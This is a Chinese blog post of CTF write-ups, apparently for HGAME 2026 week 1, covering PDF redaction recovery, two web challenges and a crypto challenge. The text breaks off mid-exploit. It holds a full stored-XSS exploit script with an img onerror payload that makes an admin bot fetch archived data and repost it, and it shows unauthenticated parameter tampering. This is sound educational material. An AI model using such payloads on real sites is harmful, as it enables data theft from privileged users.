<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 8.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/medias/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/medias/favicon.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/medias/favicon.png">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="/lib/@fortawesome/fontawesome-free/css/all.min.css">

<script class="next-config" data-name="main" type="application/json">{"hostname":"dodor.top","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.29.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":false,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-okaidia"},"copy_button":{"enable":true,"style":"flat"},"fold":{"enable":false,"height":500},"language":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":false,"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":3,"unescape":false,"preload":true}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="misc: [REDACTED] 题目为（涂黑，修改）过后的一个pdf，我们可以在第一个涂黑位置找到第一段敏感字符串，直接通过文字编辑功能将颜色改为白色再复制出来得到第一个字符串 1:PAR4D0X 。( 然后在第二个涂黑的位置在文字编辑的模式下可以看到以下内容 因为字体原因无法直接复制，选着直接图…">
<meta property="og:type" content="article">
<meta property="og:title" content="DODOR#000a01-WEEK1-WP">
<meta property="og:url" content="https://dodor.top/2026/02/09/DODOR-000a01-WEEK1-WP/index.html">
<meta property="og:site_name" content="DODOR&#39;s BLOG">
<meta property="og:description" content="misc: [REDACTED] 题目为（涂黑，修改）过后的一个pdf，我们可以在第一个涂黑位置找到第一段敏感字符串，直接通过文字编辑功能将颜色改为白色再复制出来得到第一个字符串 1:PAR4D0X 。( 然后在第二个涂黑的位置在文字编辑的模式下可以看到以下内容 因为字体原因无法直接复制，选着直接图…">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-08%20203633.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-03%20165813.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-03%20170152.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-03%20170751.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-05%20171658.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-05%20200000.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-08%20205415.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-05%20180535.png">
<meta property="og:image" content="https://dodor.top/imgs/hgame/image-20260208210404239.png">
<meta property="og:image" content="https://dodor.top/imgs/hgame/screenshot-2026-02-02-112832.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-02%20112818.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-02%20112849.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/image-20260208211730847.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-06%20115538.png">
<meta property="og:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-08%20213711.png">
<meta property="article:published_time" content="2026-02-09T13:38:58.000Z">
<meta property="article:modified_time" content="2026-08-30T07:27:29.571Z">
<meta property="article:author" content="DODOR">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-08%20203633.png">


<link rel="canonical" href="https://dodor.top/2026/02/09/DODOR-000a01-WEEK1-WP/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://dodor.top/2026/02/09/DODOR-000a01-WEEK1-WP/","path":"2026/02/09/DODOR-000a01-WEEK1-WP/","title":"DODOR#000a01-WEEK1-WP"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>DODOR#000a01-WEEK1-WP | DODOR's BLOG</title>
  








  
  <script src="/lib/medium-zoom/dist/medium-zoom.min.js" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="/lib/hexo-generator-searchdb/dist/search.js" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  




<link rel="alternate" type="application/atom+xml" href="/atom.xml" title="DODOR's BLOG">

  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">DODOR's BLOG</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-friends"><a href="/friends/" rel="section"><i class="fa fa-address-book fa-fw"></i>友链</a></li><li class="menu-item menu-item-rss"><a href="/atom.xml" rel="section"><i class="fa fa-rss fa-fw"></i>RSS</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#misc"><span class="nav-number">1.</span> <span class="nav-text">misc:</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#REDACTED"><span class="nav-number">1.1.</span> <span class="nav-text">[REDACTED]</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web"><span class="nav-number">2.</span> <span class="nav-text">web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%AD%94%E7%90%86%E6%B2%99%E7%9A%84%E9%AD%94%E6%B3%95%E7%9B%AE%E5%BD%95"><span class="nav-number">2.1.</span> <span class="nav-text">魔理沙的魔法目录</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8D%9A%E4%B8%BD%E7%A5%9E%E7%A4%BE%E7%9A%84%E7%BB%98%E9%A9%AC%E6%8C%82"><span class="nav-number">2.2.</span> <span class="nav-text">博丽神社的绘马挂</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#crypto"><span class="nav-number">3.</span> <span class="nav-text">crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Flux"><span class="nav-number">3.1.</span> <span class="nav-text">Flux</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="DODOR"
      src="/medias/qingxu.jpg">
  <p class="site-author-name" itemprop="name">DODOR</p>
  <div class="site-description" itemprop="description">CTF 复现与总结、Rust 等技术学习笔记、折腾记录</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://dodor.top/2026/02/09/DODOR-000a01-WEEK1-WP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/medias/qingxu.jpg">
      <meta itemprop="name" content="DODOR">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="DODOR's BLOG">
      <meta itemprop="description" content="CTF 复现与总结、Rust 等技术学习笔记、折腾记录">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="DODOR#000a01-WEEK1-WP | DODOR's BLOG">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          DODOR#000a01-WEEK1-WP
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2026-02-09 21:38:58" itemprop="dateCreated datePublished" datetime="2026-02-09T21:38:58+08:00">2026-02-09</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2026-08-30 15:27:29" itemprop="dateModified" datetime="2026-08-30T15:27:29+08:00">2026-08-30</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>1.4k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>5 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="misc"><a href="#misc" class="headerlink" title="misc:"></a>misc:</h2><h3 id="REDACTED"><a href="#REDACTED" class="headerlink" title="[REDACTED]"></a>[REDACTED]</h3><p>题目为（涂黑，修改）过后的一个pdf，我们可以在第一个涂黑位置找到第一段敏感字符串，直接通过文字编辑功能将颜色改为白色再复制出来得到第一个字符串<strong>1:PAR4D0X</strong>。(<img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-08%20203633.png" alt="屏幕截图 2026-02-08 203633"></p>
<p>然后在第二个涂黑的位置在文字编辑的模式下可以看到以下内容<img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-03%20165813.png"></p>
<p>因为字体原因无法直接复制，选着直接图像识别。三段经典JWT，第一段是加密方式，第二段为内容，第三段为签名，经过base64解码得出第二个字符串<strong>2:AllCl3arToPr0ceed</strong></p>
<p><img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-03%20170152.png"></p>
<p>随后在图片位置有处涂黑，拉对比度和亮度识别出第三个字符串<strong>3:Sh4m1R</strong></p>
<p><img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-03%20170751.png"></p>
<p>最后在检查pdf的文件结构时发现其尾部有2个%EOF为结尾，可知为pdf的增量更新，第四个字符藏在旧版本被删掉的那一页里。</p>
<p><img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-05%20171658.png"></p>
<p>我们现在要做的就是将那删掉的一页恢复，也就是定位到第一个%EOF的位置对pdf进行切片，通过grep找到%EOF的位置。<img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-05%20200000.png"></p>
<p><img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-08%20205415.png"></p>
<p>计算%EOF的代码如下</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"manual.pdf"</span><span class="token punctuation">,</span> <span class="token string">"rb"</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f_in<span class="token punctuation">:</span>
    <span class="token builtin">file</span> <span class="token operator">=</span> f_in<span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"manual_old.pdf"</span><span class="token punctuation">,</span> <span class="token string">"wb"</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f_out<span class="token punctuation">:</span>
    f_out<span class="token punctuation">.</span>write<span class="token punctuation">(</span><span class="token builtin">file</span><span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token number">234721</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>打开manual_old.pdf</p>
<p><img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-05%20180535.png"></p>
<p>找到第四段字符串<strong>4:D0cR3qu3st3r_Tutu</strong>,最后连接得到flag。</p>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="魔理沙的魔法目录"><a href="#魔理沙的魔法目录" class="headerlink" title="魔理沙的魔法目录"></a>魔理沙的魔法目录</h3><p><img src="/imgs/hgame/image-20260208210404239.png" alt="image-20260208210404239"></p>
<p>用F12及网络保存日志可知，每过一定时长，服务器会发送一个record和一个check的请求，record请求荷载为{“time”:10}，而题目对身份没有做限制，可以直接对&#x2F;record用post的application&#x2F;json传参{“time”:7200}(大于1小时)</p>
<p><img src="/imgs/hgame/screenshot-2026-02-02-112832.png"></p>
<p><img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-02%20112818.png"></p>
<p>最终访问&#x2F;check得到flag为：</p>
<p><img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-02%20112849.png"></p>
<h3 id="博丽神社的绘马挂"><a href="#博丽神社的绘马挂" class="headerlink" title="博丽神社的绘马挂"></a><strong>博丽神社的绘马挂</strong></h3><p>题目说明紫在归档完毕的绘马里藏了一些不可告人的秘密。分析前端代码及main.js。发现，题目没有对消息提交界面的content做过滤处理<img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/image-20260208211730847.png" alt="image-20260208211730847"></p>
<p>同时有&#x2F;api&#x2F;report可以让Reimu访问。由此得到本体为存储型XSS，但是普通用户看不到已归档的内容，所以接下来的思路就是通过XSS漏洞让管理员在已归档的文档中找到flag，并通过&#x2F;api&#x2F;message发出来，这样普通用户就能看到了。按照以上思路构造payload，写脚本如下：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> re
<span class="token keyword">import</span> time
<span class="token keyword">import</span> string
<span class="token keyword">import</span> requests
site <span class="token operator">=</span> <span class="token string">"http://local-2.hgame.vidar.club:31464"</span>
<span class="token keyword">def</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    s <span class="token operator">=</span> requests<span class="token punctuation">.</span>Session<span class="token punctuation">(</span><span class="token punctuation">)</span>
    user <span class="token operator">=</span> <span class="token string-interpolation"><span class="token string">f"admin"</span></span>
    pw <span class="token operator">=</span> <span class="token string-interpolation"><span class="token string">f"123456"</span></span>
    r <span class="token operator">=</span> s<span class="token punctuation">.</span>post<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"</span><span class="token interpolation"><span class="token punctuation">&#123;</span>site<span class="token punctuation">&#125;</span></span><span class="token string">/api/auth/login"</span></span><span class="token punctuation">,</span> json<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token string">"username"</span><span class="token punctuation">:</span> user<span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">:</span> pw<span class="token punctuation">&#125;</span><span class="token punctuation">)</span>
    js <span class="token operator">=</span> <span class="token triple-quoted-string string">"""
(async()=>&#123;
  try&#123;
    const a = await fetch('/api/archives').then(r=>r.json());
    const m = JSON.stringify(a).match(/Hgame\&#123;[^&#125;]+\&#125;/);
    if(m)&#123;
      await fetch('/api/messages', &#123;
        method: 'POST',
        headers: &#123;'Content-Type':'application/json'&#125;,
        body: JSON.stringify(&#123;content: m, is_private: false&#125;)
      &#125;);
    &#125;
  &#125;catch(e)&#123;&#125;
&#125;)();
"""</span><span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"\n"</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token comment">#让Reimu访问归档页面获取flag再返回到提交message</span>

    payload <span class="token operator">=</span> <span class="token string-interpolation"><span class="token string">f"&lt;img src=x onerror=\"</span><span class="token interpolation"><span class="token punctuation">&#123;</span>js<span class="token punctuation">&#125;</span></span><span class="token string">\">"</span></span>

    r <span class="token operator">=</span> s<span class="token punctuation">.</span>post<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"</span><span class="token interpolation"><span class="token punctuation">&#123;</span>site<span class="token punctuation">&#125;</span></span><span class="token string">/api/messages"</span></span><span class="token punctuation">,</span> json<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token string">"content"</span><span class="token punctuation">:</span> payload<span class="token punctuation">,</span> <span class="token string">"is_private"</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">&#125;</span><span class="token punctuation">)</span>
    <span class="token keyword">if</span> r<span class="token punctuation">.</span>status_code <span class="token operator">!=</span> <span class="token number">200</span><span class="token punctuation">:</span>
        <span class="token keyword">raise</span> SystemExit<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"post failed: </span><span class="token interpolation"><span class="token punctuation">&#123;</span>r<span class="token punctuation">.</span>status_code<span class="token punctuation">&#125;</span></span><span class="token string"> </span><span class="token interpolation"><span class="token punctuation">&#123;</span>r<span class="token punctuation">.</span>text<span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span>
    
    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            s<span class="token punctuation">.</span>post<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"</span><span class="token interpolation"><span class="token punctuation">&#123;</span>site<span class="token punctuation">&#125;</span></span><span class="token string">/api/report"</span></span><span class="token punctuation">,</span> timeout<span class="token operator">=</span><span class="token number">8</span><span class="token punctuation">)</span>
            <span class="token keyword">break</span>
        <span class="token keyword">except</span> Exception<span class="token punctuation">:</span>
            time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span>

    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        r <span class="token operator">=</span> s<span class="token punctuation">.</span>get<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"</span><span class="token interpolation"><span class="token punctuation">&#123;</span>site<span class="token punctuation">&#125;</span></span><span class="token string">/api/messages"</span></span><span class="token punctuation">)</span>
        <span class="token keyword">if</span> r<span class="token punctuation">.</span>status_code <span class="token operator">==</span> <span class="token number">200</span><span class="token punctuation">:</span>
            m <span class="token operator">=</span> re<span class="token punctuation">.</span>search<span class="token punctuation">(</span><span class="token string">r"Hgame\&#123;[^&#125;]+\&#125;"</span><span class="token punctuation">,</span> r<span class="token punctuation">.</span>text<span class="token punctuation">)</span>
            <span class="token keyword">if</span> m<span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>m<span class="token punctuation">.</span>group<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
                <span class="token keyword">return</span>
        time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span>

    <span class="token keyword">raise</span> SystemExit<span class="token punctuation">(</span><span class="token string">"fail"</span><span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
    main<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这里用的上传漏洞是故意导致错误，让管理员自动执行onerror后的命令。</p>
<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>img src<span class="token operator">=</span>x onerror<span class="token operator">=</span><span class="token string">"payload"</span><span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>最后得到flag<img src="https://raw.githubusercontent.com/DODOR-ddd/Image/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202026-02-06%20115538.png"></p>
<h2 id="crypto"><a href="#crypto" class="headerlink" title="crypto"></a>crypto</h2><h3 id="Flux"><a href="#Flux" class="headerlink" title="Flux"></a>Flux</h3><p>题目给出自定义二次同余递推类<code>Flux</code>和哈希函数<code>shash</code>的实现代码，运行后生成<code>data.txt</code>（包含<code>Flux</code>的4个连续输出值、260位素数模数<code>n</code>）。已知<code>shash</code>的密钥<code>key</code>位长小于70，目标是恢复<code>key</code>，并计算<code>shash(&quot;I get the key now!&quot;, key)</code>的十六进制结果，用<code>VIDAR{...}</code>包裹为flag。</p>
<p>EXP如下</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> ast
<span class="token keyword">from</span> typing <span class="token keyword">import</span> Tuple<span class="token punctuation">,</span> Optional

<span class="token keyword">def</span> <span class="token function">read_data</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> Tuple<span class="token punctuation">[</span><span class="token builtin">list</span><span class="token punctuation">,</span> <span class="token builtin">int</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
    <span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'data.txt'</span><span class="token punctuation">,</span> <span class="token string">'r'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
        xs <span class="token operator">=</span> ast<span class="token punctuation">.</span>literal_eval<span class="token punctuation">(</span>f<span class="token punctuation">.</span>readline<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
        n <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>f<span class="token punctuation">.</span>readline<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> xs<span class="token punctuation">,</span> n

<span class="token keyword">def</span> <span class="token function">inv</span><span class="token punctuation">(</span>a<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">,</span> n<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> <span class="token builtin">int</span><span class="token punctuation">:</span>
    <span class="token keyword">return</span> <span class="token builtin">pow</span><span class="token punctuation">(</span>a<span class="token punctuation">,</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">,</span> n<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">legendre</span><span class="token punctuation">(</span>a<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">,</span> p<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> <span class="token builtin">int</span><span class="token punctuation">:</span>
    <span class="token keyword">return</span> <span class="token builtin">pow</span><span class="token punctuation">(</span>a<span class="token punctuation">,</span> <span class="token punctuation">(</span>p <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">//</span> <span class="token number">2</span><span class="token punctuation">,</span> p<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">tonelli_shanks</span><span class="token punctuation">(</span>a<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">,</span> p<span class="token punctuation">:</span> <span class="token builtin">int</span><span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> Optional<span class="token punctuation">[</span><span class="token builtin">int</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
    <span class="token keyword">if</span> a <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token number">0</span>
    <span class="token keyword">if</span> legendre<span class="token punctuation">(</span>a<span class="token punctuation">,</span> p<span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token number">1</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token boolean">None</span>
    <span class="token keyword">if</span> p <span class="token operator">%</span> <span class="token number">4</span> <span class="token operator">==</span> <span class="token number">3</span><span class="token punctuation">:</span>
